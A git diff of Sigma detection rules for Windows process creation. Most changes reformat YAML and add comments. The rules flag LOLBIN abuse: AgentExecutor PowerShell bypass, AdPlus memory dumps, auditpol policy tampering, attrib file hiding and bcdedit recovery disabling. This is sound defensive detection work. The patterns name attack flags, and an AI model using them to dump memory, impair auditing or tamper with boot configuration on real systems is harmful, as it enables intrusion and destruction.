a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml index 68bceba03..9ad833313 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml @@ -1,8 +1,7 @@ title: AddinUtil.EXE Execution From Uncommon Directory id: 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 status: experimental -description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - from a non-standard directory. +description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - NewProcessName|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe filter_main_legit_location: - NewProcessName|contains: + NewProcessName|contains: - :\Windows\Microsoft.NET\Framework\ - :\Windows\Microsoft.NET\Framework64\ - :\Windows\WinSxS\ diff --git a/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml b/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml index 7c4da1683..d0379932a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml @@ -1,9 +1,7 @@ title: Potential Adplus.EXE Abuse id: 2f869d59-7f6a-4931-992c-cce556ff2d53 status: experimental -description: Detects execution of "AdPlus.exe", a binary that is part of the Windows - SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary - commands. +description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - https://twitter.com/nas_bench/status/1534916659676422152 @@ -23,16 +21,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \adplus.exe - - OriginalFileName: Adplus.exe + - NewProcessName|endswith: \adplus.exe + - OriginalFileName: Adplus.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Dump process memory - ' -hang ' - ' -pn ' - ' -pmn ' - ' -p ' - ' -po ' + # Using a config file - ' -c ' + # Execute commands inline - ' -sc ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml index 3d9268e64..3d680663d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml @@ -1,13 +1,10 @@ title: AgentExecutor PowerShell Execution id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 related: - - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab - type: similar + - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 @@ -26,15 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - NewProcessName: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use via Intune management. You exclude script paths and names to - reduce FP rate + - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml index ba6dde1f2..d1f3e8881 100644 --- a/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml @@ -1,13 +1,10 @@ title: Suspicious AgentExecutor PowerShell Execution id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab related: - - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 - type: similar + - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61 + type: similar status: test -description: Detects execution of the AgentExecutor.exe binary. Which can be abused - as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or - any binary named "powershell.exe" located in the path provided by 6th positional - argument +description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 @@ -26,14 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \AgentExecutor.exe - - OriginalFileName: AgentExecutor.exe + - NewProcessName|endswith: \AgentExecutor.exe + - OriginalFileName: AgentExecutor.exe selection_cli: - CommandLine|contains: - - ' -powershell' + # Example: + # AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64] + # Note: + # - If [timeoutSeconds] is NULL then it defaults to 60000 + # - If [enforceSignatureCheck] is: + # - "NULL" or "1" then a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy allsigned -file " + # - Else a PowerShell instance is spawned with the args: "-NoProfile -executionPolicy bypass -file " + # - [powershellPath] is always concatendated to "powershell.exe" + CommandLine|contains: + - ' -powershell' # Also covers the "-powershellDetection" flag - ' -remediationScript' filter_main_pwsh: - CommandLine|contains: + CommandLine|contains: - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ - C:\Windows\System32\WindowsPowerShell\v1.0\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml index efa14d313..1b069c6cd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml @@ -1,17 +1,11 @@ title: Uncommon Child Process Of Appvlp.EXE id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 status: test -description: 'Detects uncommon child processes of Appvlp.EXE - - Appvlp or the Application Virtualization Utility is included with Microsoft Office. - Attackers are able to abuse "AppVLP" to execute shell commands. - - Normally, this binary is used for Application Virtualization, but it can also - be abused to circumvent the ASR file path rule folder - +description: | + Detects uncommon child processes of Appvlp.EXE + Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. + Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file. - - ' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/ author: Sreeman @@ -31,22 +25,21 @@ detection: selection: ParentProcessName|endswith: \appvlp.exe filter_main_generic: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\SysWOW64\rundll32.exe - :\Windows\System32\rundll32.exe filter_optional_office_msoasb: - NewProcessName|contains: :\Program Files\Microsoft Office - NewProcessName|endswith: \msoasb.exe + NewProcessName|contains: :\Program Files\Microsoft Office + NewProcessName|endswith: \msoasb.exe filter_optional_office_skype: - NewProcessName|contains|all: + NewProcessName|contains|all: - :\Program Files\Microsoft Office - \SkypeSrv\ - NewProcessName|endswith: \SKYPESERVER.EXE + NewProcessName|endswith: \SKYPESERVER.EXE filter_optional_office_msouc: - NewProcessName|contains: :\Program Files\Microsoft Office - NewProcessName|endswith: \MSOUC.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + NewProcessName|contains: :\Program Files\Microsoft Office + NewProcessName|endswith: \MSOUC.EXE + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml index c1a877bfc..0736c60c8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml @@ -1,15 +1,14 @@ title: AspNetCompiler Execution -id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 +id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar status: test -description: Detects execution of "aspnet_compiler.exe" which can be abused to compile - and execute C# code. +description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ @@ -27,10 +26,10 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - C:\Windows\Microsoft.NET\Framework\ - C:\Windows\Microsoft.NET\Framework64\ - NewProcessName|endswith: \aspnet_compiler.exe + NewProcessName|endswith: \aspnet_compiler.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml index 4f368439e..b8fe47a69 100644 --- a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml @@ -1,12 +1,12 @@ title: Suspicious Child Process of AspNetCompiler -id: 9ccba514-7cb6-4c5c-b377-700758f2f120 +id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild related: - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental description: Detects potentially suspicious child processes of "aspnet_compiler.exe". references: @@ -27,17 +27,18 @@ detection: selection_parent: ParentProcessName|endswith: \aspnet_compiler.exe selection_child: - - NewProcessName|endswith: - - \calc.exe - - \notepad.exe - - NewProcessName|contains: - - \Users\Public\ - - \AppData\Local\Temp\ - - \AppData\Local\Roaming\ - - :\Temp\ - - :\Windows\Temp\ - - :\Windows\System32\Tasks\ - - :\Windows\Tasks\ + # Note: add other potential suspicious child processes and paths + - NewProcessName|endswith: + - \calc.exe + - \notepad.exe + - NewProcessName|contains: + - \Users\Public\ + - \AppData\Local\Temp\ + - \AppData\Local\Roaming\ + - :\Temp\ + - :\Windows\Temp\ + - :\Windows\System32\Tasks\ + - :\Windows\Tasks\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml index 413d4ab8c..f2019f226 100644 --- a/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml @@ -1,15 +1,14 @@ title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler -id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 +id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental -description: Detects execution of "aspnet_compiler.exe" with potentially suspicious - paths for compilation. +description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. references: - https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ @@ -26,7 +25,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Note: add other potential suspicious paths - \Users\Public\ - \AppData\Local\Temp\ - \AppData\Local\Roaming\ @@ -34,10 +34,10 @@ detection: - :\Windows\Temp\ - :\Windows\System32\Tasks\ - :\Windows\Tasks\ - NewProcessName|contains: + NewProcessName|contains: - C:\Windows\Microsoft.NET\Framework\ - C:\Windows\Microsoft.NET\Framework64\ - NewProcessName|endswith: \aspnet_compiler.exe + NewProcessName|endswith: \aspnet_compiler.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml b/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml index d1df05f01..55028f48d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_at_interactive_execution.yml @@ -1,8 +1,7 @@ title: Interactive AT Job id: 60fc936d-2eb0-4543-8a13-911c750a1dfc status: test -description: Detects an interactive AT job, which may be used as a form of privilege - escalation. +description: Detects an interactive AT job, which may be used as a form of privilege escalation. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md - https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html @@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: interactive - NewProcessName|endswith: \at.exe + CommandLine|contains: interactive + NewProcessName|endswith: \at.exe condition: process_creation and selection falsepositives: - Unlikely (at.exe deprecated as of Windows 8) diff --git a/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml b/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml index ec5a4d47d..06f7f39c2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml @@ -19,20 +19,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - NewProcessName|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +h ' + CommandLine|contains: ' +h ' filter_msiexec: - CommandLine|contains: '\desktop.ini ' + CommandLine|contains: '\desktop.ini ' filter_intel: - CommandLine: +R +H +S +A \\\*.cui + CommandLine: +R +H +S +A \\\*.cui ParentCommandLine: C:\\WINDOWS\\system32\\\*.bat ParentProcessName|endswith: \cmd.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of - cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) + - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) - Msiexec.exe hiding desktop.ini level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml b/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml index 45977c794..a5b80ce1b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_attrib_system.yml @@ -1,11 +1,10 @@ title: Set Files as System Files Using Attrib.EXE id: bb19e94c-59ae-4c15-8c12-c563d23fe52b related: - - id: efec536f-72e8-4656-8960-5e85d091345b - type: similar + - id: efec536f-72e8-4656-8960-5e85d091345b + type: similar status: experimental -description: Detects the execution of "attrib" with the "+s" flag to mark files as - system files +description: Detects the execution of "attrib" with the "+s" flag to mark files as system files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - NewProcessName|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s ' + CommandLine|contains: ' +s ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml index 84eab3c49..56c9e65fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml @@ -1,15 +1,11 @@ title: Set Suspicious Files as System Files Using Attrib.EXE id: efec536f-72e8-4656-8960-5e85d091345b related: - - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b - type: derived + - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b + type: derived status: experimental -description: 'Detects the usage of attrib with the "+s" option to set scripts or executables - located in suspicious locations as system files to hide them from users and make - them unable to be deleted with simple rights. The rule limits the search to specific - extensions and directories to avoid FPs - - ' +description: | + Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs references: - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4 - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0 @@ -28,20 +24,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - NewProcessName|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s' + CommandLine|contains: ' +s' selection_paths: - CommandLine|contains: - - ' %' + CommandLine|contains: + - ' %' # Custom Environment variable - \Users\Public\ - \AppData\Local\ - \ProgramData\ - \Downloads\ - \Windows\Temp\ selection_ext: - CommandLine|contains: + CommandLine|contains: - .bat - .dll - .exe @@ -50,7 +46,7 @@ detection: - .vbe - .vbs filter: - CommandLine|contains|all: + CommandLine|contains|all: - \Windows\TEMP\ - .exe condition: process_creation and (all of selection* and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml b/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml index 90f35aa15..d18bf39aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml @@ -1,17 +1,12 @@ title: Audit Policy Tampering Via NT Resource Kit Auditpol id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e related: - - id: 0a13e132-651d-11eb-ae93-0242ac130002 - type: similar + - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version + type: similar status: test -description: 'Threat actors can use an older version of the auditpol binary available - inside the NT resource kit to change audit policy configuration to impair detection - capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol author: Nasreddine Bencherchali (Nextron Systems) @@ -28,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /logon:none - /system:none - /sam:none @@ -38,8 +33,6 @@ detection: - /policy:none condition: process_creation and selection falsepositives: - - The old auditpol utility isn't available by default on recent versions of Windows - as it was replaced by a newer version. The FP rate should be very low except - for tools that use a similar flag structure + - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml index 6c580900d..ef87f6a21 100644 --- a/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml @@ -1,16 +1,12 @@ title: Audit Policy Tampering Via Auditpol id: 0a13e132-651d-11eb-ae93-0242ac130002 related: - - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e - type: similar + - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol + type: similar status: test -description: 'Threat actors can use auditpol binary to change audit policy configuration - to impair detection capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Janantha Marasinghe (https://github.com/blueteam0ps) @@ -27,17 +23,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \auditpol.exe - - OriginalFileName: AUDITPOL.EXE + - NewProcessName|endswith: \auditpol.exe + - OriginalFileName: AUDITPOL.EXE selection_cli: - CommandLine|contains: - - disable - - clear - - remove - - restore + CommandLine|contains: + - disable # disables a specific audit policy + - clear # delete or clears audit policy + - remove # removes an audit policy + - restore # restores an audit policy condition: process_creation and (all of selection_*) falsepositives: - - Administrator or administrator scripts might leverage the flags mentioned in - the detection section. Either way, it should always be monitored + - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml index f34368a68..718131b85 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml @@ -1,9 +1,7 @@ title: Indirect Inline Command Execution Via Bash.EXE id: 5edc2273-c26f-406c-83f3-f4d948e740dd status: experimental -description: Detects execution of Microsoft bash launcher with the "-c" flag. This - can be used to potentially bypass defenses and execute Linux or Windows-based - binaries directly via bash +description: Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ author: frack113 @@ -20,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - :\Windows\System32\bash.exe - - :\Windows\SysWOW64\bash.exe - - OriginalFileName: Bash.exe + - NewProcessName|endswith: + - :\Windows\System32\bash.exe + - :\Windows\SysWOW64\bash.exe + - OriginalFileName: Bash.exe selection_cli: - CommandLine|contains: ' -c ' + CommandLine|contains: ' -c ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml b/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml index 55f7b5287..e9b227775 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml @@ -1,12 +1,10 @@ title: Indirect Command Execution From Script File Via Bash.EXE id: 2d22a514-e024-4428-9dba-41505bd63a5b related: - - id: 5edc2273-c26f-406c-83f3-f4d948e740dd - type: similar + - id: 5edc2273-c26f-406c-83f3-f4d948e740dd + type: similar status: experimental -description: Detects execution of Microsoft bash launcher without any flags to execute - the content of a bash script directly. This can be used to potentially bypass - defenses and execute Linux or Windows-based binaries directly via bash +description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ - https://linux.die.net/man/1/bash @@ -24,20 +22,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - :\Windows\System32\bash.exe - - :\Windows\SysWOW64\bash.exe - - OriginalFileName: Bash.exe + - NewProcessName|endswith: + - :\Windows\System32\bash.exe + - :\Windows\SysWOW64\bash.exe + - OriginalFileName: Bash.exe filter_main_cli_flag: - CommandLine|contains: + CommandLine|contains: + # Note: we're not interested in flags being passed first - bash.exe - - bash - filter_main_no_cli: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_no_flag: - CommandLine: + CommandLine: - bash.exe - bash condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml index 845ebee46..536e09493 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml @@ -1,9 +1,7 @@ title: Boot Configuration Tampering Via Bcdedit.EXE id: 1444443e-6757-43e4-9ea4-c8fc705f79a2 status: stable -description: Detects the use of the bcdedit command to tamper with the boot configuration - data. This technique is often times used by malware or attackers as a destructive - way before launching ransomware. +description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html @@ -21,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bcdedit.exe - - OriginalFileName: bcdedit.exe + - NewProcessName|endswith: \bcdedit.exe + - OriginalFileName: bcdedit.exe selection_set: - CommandLine|contains: set + CommandLine|contains: set selection_cli: - - CommandLine|contains|all: - - bootstatuspolicy - - ignoreallfailures - - CommandLine|contains|all: - - recoveryenabled - - 'no' + - CommandLine|contains|all: + - bootstatuspolicy + - ignoreallfailures + - CommandLine|contains|all: + - recoveryenabled + - no condition: process_creation and (all of selection_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml index 2bed132a9..53fe1bb59 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bcdedit.exe - - OriginalFileName: bcdedit.exe + - NewProcessName|endswith: \bcdedit.exe + - OriginalFileName: bcdedit.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - delete - deletevalue - import diff --git a/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml index ceb911775..18fc4152f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of BgInfo.EXE id: 811f459f-9231-45d4-959a-0266c6311987 related: - - id: aaf46cdc-934e-4284-b329-34aa701e3771 - type: similar + - id: aaf46cdc-934e-4284-b329-34aa701e3771 + type: similar status: experimental -description: Detects suspicious child processes of 